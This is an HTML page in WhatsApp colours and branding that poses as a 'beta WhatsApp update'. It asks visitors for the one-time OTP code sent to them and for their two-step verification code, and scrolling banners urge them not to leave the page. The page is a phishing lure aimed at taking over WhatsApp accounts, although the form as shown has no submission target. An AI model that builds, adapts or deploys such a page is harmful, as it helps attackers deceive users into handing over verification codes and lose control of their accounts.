<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=scale-device-width, initial-scale=device">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<i class="fa fa-whatsapp" style="font-size:40px;color:#25D366;margin-left: 10px;"><strong></i><i>Whatsapp</i></strong>
</head>
<style>
i{
  color: #25D366;
  margin-buttom: 5px;
  margin-left: 7px;
  font-family: helevetica;
  font-style: helevetica;
  font-size: 30px;
}
h2{
  text-align: center;
}
input{
  border-radius: 10px;
  height: 30px;
  width: 300px;
  text-align: center;
  margin-left: 20px;
  background-color: #25D366;
}
button{
  border-radius: 10px;
  height: 30px;
  width: 100px;
  color: white;
  margin-left: 20px;
  background-color: #25D366;
}
body{
  background-color: #E2D6BD;
}
mark{
  height: 100px;
  width: 100px;
  border-radius: 5px;
}
</style>
<body>
  <h2>BETA users whatsapp update</h2>
  <marquee>!!!!..This is a beta site do not refresh or leave the site until the process is complete..!!!!</marquee>
  <br>
  <p><h4>To get beta whatsapp input the OTP code sent to you:</h4></p>
<form action=>
  <label for="fname"></label>
  <input type="number" id="fname" name="fname"><br><br>
  <p><h4>To get beta whatsapp update input your two step verificaton code:</h4></p>
  <label for="lname"></label>
  <input type="number" id="lname" name="lname"><br><br>
  <input type="submit" value="verify">
</form>
  <br>
  <marquee>!!!!...GETTING THE BETA WHATSAPP UPDATE WILL SIGN YOU OUT OF YOUR WHATSAPP ACCOUNT...WHEN DONE FOLLOW THE PROCESS AND SIGN IN BACK...!!!!</marquee>
    <br>
</body>
</html>